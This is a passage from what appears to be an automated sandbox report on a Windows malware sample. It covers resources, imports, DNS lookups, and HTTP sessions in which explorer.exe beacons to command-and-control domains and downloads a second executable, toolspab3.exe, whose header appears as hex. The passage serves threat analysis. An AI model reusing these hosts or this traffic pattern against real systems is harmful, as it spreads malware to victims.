                  RT_ACCELERATOR | 0xcc9c8 | 0x78 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_ACCELERATOR | 0xcc970 | 0x58 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_GROUP_CURSOR | 0xccbc0 | 0x14 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_GROUP_CURSOR | 0xcdea0 | 0x30 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_GROUP_CURSOR | 0xce778 | 0x14 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_GROUP_ICON | 0xcc910 | 0x5a | data | Spanish | Colombia
                  None | 0xcca50 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
                  None | 0xcca60 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
                  None | 0xcca40 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
                  None | 0xcca70 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives
                  None | 0xcca80 | 0xa | data | Divehi; Dhivehi; Maldivian | Maldives

                  Imports

                  DLL | Import
                  KERNEL32.dll | GetNamedPipeHandleStateW, CreateNamedPipeA, CallNamedPipeW, TerminateThread, GetExitCodeProcess, GetVersionExA, VerifyVersionInfoW, SetConsoleCP, GetConsoleAliasesLengthA, VerLanguageNameA, FindFirstFileExA, VerifyVersionInfoA, FreeEnvironmentStringsA, GetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, TzSpecificLocalTimeToSystemTime, AddAtomA, ReleaseMutex, GetNamedPipeHandleStateA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, GlobalAlloc, Sleep, TlsSetValue, MoveFileA, GetCommandLineW, InterlockedExchange, DeleteFileW, CreateActCtxA, SetFileAttributesA, GetPrivateProfileIntW, GetProcessHeap, CreateNamedPipeW, ReadConsoleOutputCharacterA, GetStartupInfoA, GetDiskFreeSpaceExW, GetCPInfoExW, GetWindowsDirectoryW, GetSystemWow64DirectoryA, SetLastError, GetProfileStringA, GetCalendarInfoW, FreeUserPhysicalPages, GetTickCount, GetStringTypeA, DebugBreak, FindFirstFileA, lstrcmpA, WriteFile, GetConsoleMode, lstrcatW, SetFirmwareEnvironmentVariableA, DefineDosDeviceW, EndUpdateResourceA, WriteConsoleW, InterlockedIncrement, SetSystemTimeAdjustment, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileStructA, GetPrivateProfileStructW, GetFileAttributesExW, HeapUnlock, CreateIoCompletionPort, PeekConsoleInputA, GetNumberFormatW, GetQueuedCompletionStatus, FindResourceExA, SetLocalTime, TryEnterCriticalSection, CreateSemaphoreA, GetThreadLocale, SetFileShortNameA, lstrcpyA, ReplaceFileA, LockFileEx, MoveFileExA, GetConsoleCP, GetVolumePathNameA, FlushConsoleInputBuffer, SearchPathW, FreeConsole, GetConsoleAliasExesLengthW, WriteConsoleInputW, LocalShrink, SetCommState, GetSystemTimeAdjustment, EnumSystemLocalesW, ProcessIdToSessionId, GetDevicePowerState, DeleteTimerQueueTimer, GetWriteWatch, OpenSemaphoreA, GetConsoleScreenBufferInfo, ClearCommBreak, TlsAlloc, OpenMutexW, GetComputerNameW, HeapValidate, GetLastError, OpenMutexA, WaitForMultipleObjectsEx, SignalObjectAndWait, GetSystemPowerStatus, VirtualLock, SetWaitableTimer, ChangeTimerQueueTimer, GetProcessTimes, FatalAppExitA, lstrcpynA, SetNamedPipeHandleState, FillConsoleOutputCharacterA, GetCompressedFileSizeW, FindNextVolumeMountPointA, GetFullPathNameA, WriteProfileStringA, UnlockFile, GlobalAddAtomW, EnterCriticalSection, SetCurrentDirectoryW, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, IsBadReadPtr, RtlUnwind, RaiseException, GetModuleHandleW, ExitProcess, DeleteFileA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, GetCurrentThreadId, TlsFree, GetStdHandle, LoadLibraryW, GetLocaleInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStringTypeW, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, OutputDebugStringA, OutputDebugStringW, SetFilePointer, SetStdHandle, CreateFileW, CloseHandle, FlushFileBuffers

                  Possible Origin

                  Language of compilation system | Country where language is spoken
                  Divehi; Dhivehi; Maldivian | Maldives
                  Spanish | Colombia

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  12/28/21-13:56:13.072786 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP

                  ICMP Packets

                  Timestamp | Source IP | Dest IP | Checksum | Code | Type
                  Dec 28, 2021 13:56:13.072786093 CET | 192.168.2.4 | 8.8.8.8 | cff7 | (Port unreachable) | Destination Unreachable

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Dec 28, 2021 13:54:48.219171047 CET | 192.168.2.4 | 8.8.8.8 | 0xb6c3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:48.989533901 CET | 192.168.2.4 | 8.8.8.8 | 0x43a2 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:49.761595964 CET | 192.168.2.4 | 8.8.8.8 | 0x2b61 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:50.835154057 CET | 192.168.2.4 | 8.8.8.8 | 0x169 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:51.612792015 CET | 192.168.2.4 | 8.8.8.8 | 0x46a9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:52.366228104 CET | 192.168.2.4 | 8.8.8.8 | 0xbf6a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:53.156251907 CET | 192.168.2.4 | 8.8.8.8 | 0xf25f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:55.404691935 CET | 192.168.2.4 | 8.8.8.8 | 0x218a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:56.162736893 CET | 192.168.2.4 | 8.8.8.8 | 0x459a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:56.933798075 CET | 192.168.2.4 | 8.8.8.8 | 0xd74f | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:57.814192057 CET | 192.168.2.4 | 8.8.8.8 | 0x8e2b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:59.701852083 CET | 192.168.2.4 | 8.8.8.8 | 0xbd60 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:00.246870995 CET | 192.168.2.4 | 8.8.8.8 | 0xbc1a | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:01.326704979 CET | 192.168.2.4 | 8.8.8.8 | 0xbc41 | Standard query (0) | privacytools-foryou-777.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:04.660819054 CET | 192.168.2.4 | 8.8.8.8 | 0xaf15 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:05.419943094 CET | 192.168.2.4 | 8.8.8.8 | 0xd9c9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:06.551572084 CET | 192.168.2.4 | 8.8.8.8 | 0xe7dc | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:07.308656931 CET | 192.168.2.4 | 8.8.8.8 | 0x936e | Standard query (0) | unicupload.top | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:07.371721983 CET | 192.168.2.4 | 8.8.8.8 | 0xce23 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:08.133531094 CET | 192.168.2.4 | 8.8.8.8 | 0xc28f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:09.252388000 CET | 192.168.2.4 | 8.8.8.8 | 0xa4d1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:10.040391922 CET | 192.168.2.4 | 8.8.8.8 | 0x9a19 | Standard query (0) | infinity-cheats.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:11.048355103 CET | 192.168.2.4 | 8.8.8.8 | 0x9a19 | Standard query (0) | infinity-cheats.com | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:12.105007887 CET | 192.168.2.4 | 8.8.8.8 | 0x9d33 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Dec 28, 2021 13:54:48.238013029 CET | 8.8.8.8 | 192.168.2.4 | 0xb6c3 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:49.006606102 CET | 8.8.8.8 | 192.168.2.4 | 0x43a2 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:50.092185020 CET | 8.8.8.8 | 192.168.2.4 | 0x2b61 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:50.853662968 CET | 8.8.8.8 | 192.168.2.4 | 0x169 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:51.631757021 CET | 8.8.8.8 | 192.168.2.4 | 0x46a9 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:52.385042906 CET | 8.8.8.8 | 192.168.2.4 | 0xbf6a | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:53.443387985 CET | 8.8.8.8 | 192.168.2.4 | 0xf25f | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:55.421828985 CET | 8.8.8.8 | 192.168.2.4 | 0x218a | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:56.181586027 CET | 8.8.8.8 | 192.168.2.4 | 0x459a | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:56.952656031 CET | 8.8.8.8 | 192.168.2.4 | 0xd74f | No error (0) | data-host-coin-8.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:54:57.830703974 CET | 8.8.8.8 | 192.168.2.4 | 0x8e2b | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:55:00.049293041 CET | 8.8.8.8 | 192.168.2.4 | 0xbd60 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:00.569410086 CET | 8.8.8.8 | 192.168.2.4 | 0xbc1a | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:01.678086996 CET | 8.8.8.8 | 192.168.2.4 | 0xbc41 | No error (0) | privacytools-foryou-777.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:04.677397013 CET | 8.8.8.8 | 192.168.2.4 | 0xaf15 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:05.796927929 CET | 8.8.8.8 | 192.168.2.4 | 0xd9c9 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:06.568032026 CET | 8.8.8.8 | 192.168.2.4 | 0xe7dc | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:07.327295065 CET | 8.8.8.8 | 192.168.2.4 | 0x936e | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:07.388578892 CET | 8.8.8.8 | 192.168.2.4 | 0xce23 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:08.504429102 CET | 8.8.8.8 | 192.168.2.4 | 0xc28f | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:09.271675110 CET | 8.8.8.8 | 192.168.2.4 | 0xa4d1 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:12.068723917 CET | 8.8.8.8 | 192.168.2.4 | 0x9a19 | Server failure (2) | infinity-cheats.com | none | none | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:12.122045040 CET | 8.8.8.8 | 192.168.2.4 | 0x9d33 | No error (0) | host-data-coin-11.com | | 47.251.11.252 | A (IP address) | IN (0x0001)
                  Dec 28, 2021 13:56:13.072597980 CET | 8.8.8.8 | 192.168.2.4 | 0x9a19 | Server failure (2) | infinity-cheats.com | none | none | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • dbbxvwuoso.com
                    • host-data-coin-11.com
                  • yawyilmlp.com
                  • oabgiwp.net
                  • hwrkvn.net
                  • oskoy.org
                  • yhvtxw.net
                  • kfdyfm.net
                  • jealulibe.org
                  • axnxlm.org
                  • data-host-coin-8.com
                  • mgnuugce.com
                  • kctmodtvj.net
                  • lspsrkslr.org
                  • privacytools-foryou-777.com
                  • clunuonr.net
                  • pebbfc.com
                  • xkoocu.com
                  • unicupload.top
                  • xpkuvjioi.org
                  • nxjfh.org
                  • ithwflphmf.org

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.4 | 49786 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:54:48.415672064 CET | 1534 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dbbxvwuoso.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 148
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:48.974246025 CET | 1534 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:48 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 19{i+,GO0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.4 | 49787 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:54:49.189124107 CET | 1535 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://yawyilmlp.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 213
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:49.753453970 CET | 1536 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  10 | 192.168.2.4 | 49798 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:54:58.363480091 CET | 1560 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://mgnuugce.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 143
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:54:58.914283037 CET | 1560 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:54:58 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 0
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  11 | 192.168.2.4 | 49799 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:55:00.231923103 CET | 1561 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://kctmodtvj.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 246
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:55:00.794028044 CET | 1562 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:55:00 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 37I:82OR%@_M-\z.TKC0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  12 | 192.168.2.4 | 49844 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:00.745909929 CET | 10446 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lspsrkslr.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 269
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:01.319165945 CET | 10447 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:01 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 46I:82OOjpYJRg%XQAc}yc0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  13 | 192.168.2.4 | 49845 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:01.860596895 CET | 10447 | OUT | GET /downloads/toolspab3.exe HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: privacytools-foryou-777.com
                  Dec 28, 2021 13:56:02.409576893 CET | 10454 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:02 GMT
                  Content-Type: application/x-msdos-program
                  Content-Length: 339456
                  Connection: close
                  Last-Modified: Tue, 28 Dec 2021 12:56:02 GMT
                  ETag: W/"52e00-5d43457ecb7e9"
                  Accept-Ranges: bytes
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 1b b4 65 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 b0 3d 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 93 13 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc eb 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4e ed 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 6a 65 76 75 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 7a 69 00 00 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc ee 03 00 f8 ee 03 00 0c ef 03 00 1e ef 03 00 30 ef 03 00 46 ef 03 00 56 ef 03 00 6c ef 03 00 7c ef 03 00 98 ef 03 00 ac ef 03 00 c0 ef 03 00 d6 ef 03
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PELe` =@@(b$!p@.textN `.dataho@.pejevup~@.dozi@.rsrcbd@@.reloc;<@B0FVl|


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  14 | 192.168.2.4 | 49854 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:04.853841066 CET | 10824 | OUT | POST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://clunuonr.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 130
                  Host: host-data-coin-11.com
                  Dec 28, 2021 13:56:05.407126904 CET | 10830 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Tue, 28 Dec 2021 12:56:05 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  15 | 192.168.2.4 | 49857 | 47.251.11.252 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 28, 2021 13:56:05.972120047 CET | 10831 | OUT | POST / HTTP/1.1
